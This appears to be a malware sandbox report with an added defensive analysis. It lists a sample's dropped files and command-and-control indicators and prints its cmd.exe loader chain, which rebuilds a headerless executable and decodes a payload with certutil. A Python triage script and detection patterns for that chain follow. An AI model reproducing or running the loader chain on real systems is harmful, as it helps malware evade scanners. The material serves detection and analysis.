Technical Information
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\7zipsfx.000\bolo.com
- %TEMP%\7zipsfx.000\lsm.com
- %TEMP%\7zipsfx.000\vngg.com
- %TEMP%\7zipsfx.000\smss.com
- %TEMP%\7zipsfx.000\treaz
- '34.##.125.60':80
- http://34.##.125.60/gate/log.php
- DNS ASK drive.google.com
- DNS ASK do#########ocs.googleusercontent.com
- '%TEMP%\7zipsfx.000\smss.com' treaz
- '%WINDIR%\syswow64\cmd.exe' /c <nul set /p ="M" > smss.com & type lsm.com >> smss.com & del lsm.com & certutil -decode bolo.com treaz & smss.com treaz & timeout 1 (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c <nul set /p ="M" > smss.com & type lsm.com >> smss.com & del lsm.com & certutil -decode bolo.com treaz & smss.com treaz & timeout 1
- '%WINDIR%\syswow64\certutil.exe' -decode bolo.com treaz
- '%WINDIR%\syswow64\timeout.exe' 1
- '%WINDIR%\syswow64\svchost.exe'
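The cmd.exe line above is the part of this chain worth understanding. `<nul set /p ="M" > smss.com` writes a single `M` byte with no trailing newline, and `type lsm.com >> smss.com` appends lsm.com, so lsm.com is an executable stored on disk with its leading `M` stripped (no `MZ` header for a static scanner to match). `certutil -decode bolo.com treaz` base64-decodes the second dropped file with a tool that ships with Windows, and the rebuilt smss.com is then run with treaz as its argument. The Python below is an added example, not part of the sandbox output or of the sample itself: it flags this pattern in process command lines and replays the rebuild and decode steps in memory so the dropped files can be hashed and scanned without executing anything. The command lines and the `lsm.com`/`bolo.com` stand-ins are constructed for the example; the real dropped files are not on this page, and what smss.com is beyond "the rebuilt executable" is not determined here.

```python
"""Offline triage of the cmd.exe chain above: flag the pattern in process
logs and rebuild the dropped files without executing them."""
import base64
import re

# Constructed sample process command lines (example data, not from the
# sandbox report). The first is the observed chain with the %TEMP% prefix
# dropped; the rest are benign controls.
SAMPLE_CMDLINES = [
    'cmd.exe /c <nul set /p ="M" > smss.com & type lsm.com >> smss.com '
    '& del lsm.com & certutil -decode bolo.com treaz & smss.com treaz & timeout 1',
    'cmd.exe /c type today.log >> archive.log',
    'certutil.exe -verify server.cer',
    'certutil.exe -decode mail.b64 mail.eml',
]

# '<nul set /p ="M" > out' writes a bare "M" (no newline); 'type body >> out'
# appends a file whose first byte was stripped, restoring an "MZ" header.
MZ_REBUILD = re.compile(
    r'set\s+/p\s*=\s*"?M"?\s*>\s*(?P<out>\S+)\s*&\s*type\s+(?P<body>\S+)\s*>>\s*(?P=out)',
    re.IGNORECASE,
)
# certutil -decode is a base64 decoder that ships with Windows.
CERTUTIL_DECODE = re.compile(
    r'certutil(?:\.exe)?\s+-decode\s+(?P<src>\S+)\s+(?P<dst>\S+)', re.IGNORECASE
)


def triage_cmdline(cmdline: str) -> list:
    """Return (technique, detail) findings for one process command line."""
    findings = []
    if m := MZ_REBUILD.search(cmdline):
        findings.append(("mz_header_rebuild", f"{m['body']} -> {m['out']}"))
    if m := CERTUTIL_DECODE.search(cmdline):
        findings.append(("certutil_decode", f"{m['src']} -> {m['dst']}"))
    return findings


def severity(findings: list) -> str:
    """certutil -decode alone is common admin noise; the header rebuild is not."""
    kinds = {k for k, _ in findings}
    if "mz_header_rebuild" in kinds:
        return "high"
    return "medium" if "certutil_decode" in kinds else "none"


def rebuild_executable(headerless_body: bytes) -> bytes:
    """Replay the cmd.exe step in memory: put the stripped 'M' back."""
    return b"M" + headerless_body


def certutil_decode(blob: bytes) -> bytes:
    """Replay 'certutil -decode': drop BEGIN/END lines, base64-decode the rest."""
    body = b"".join(
        ln.strip() for ln in blob.splitlines()
        if ln.strip() and not ln.strip().startswith(b"-----")
    )
    return base64.b64decode(body, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """MZ signature plus e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed stand-ins for the dropped files (not the real samples): a
# minimal DOS/PE header skeleton with its first byte removed, and a
# certutil -encode style blob wrapping an arbitrary payload.
FAKE_PE = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 20
DROPPED_LSM = FAKE_PE[1:]  # what lsm.com would look like on disk
DROPPED_BOLO = (
    b"-----BEGIN CERTIFICATE-----\r\n"
    + base64.b64encode(b"payload handed to smss.com as argv[1]") + b"\r\n"
    + b"-----END CERTIFICATE-----\r\n"
)


def run_demo() -> dict:
    """Triage the sample log lines and rebuild the constructed drop."""
    verdicts = {c: severity(triage_cmdline(c)) for c in SAMPLE_CMDLINES}
    exe = rebuild_executable(DROPPED_LSM)
    return {
        "verdicts": verdicts,
        "dropped_is_pe": looks_like_pe(DROPPED_LSM),
        "rebuilt_is_pe": looks_like_pe(exe),
        "decoded": certutil_decode(DROPPED_BOLO),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Run it as-is to see the verdicts, or pass the bytes of a real lsm.com and bolo.com to rebuild_executable() and certutil_decode() and hash or scan the results. Note that `certutil -decode` on its own is noisy wherever administrators handle certificates from the command line, which is why severity() only reaches high on the header-rebuild pattern; a process-creation detection rule for this chain should key on the `set /p` redirection followed by `type ... >>` into the same file, with the certutil decode as corroboration.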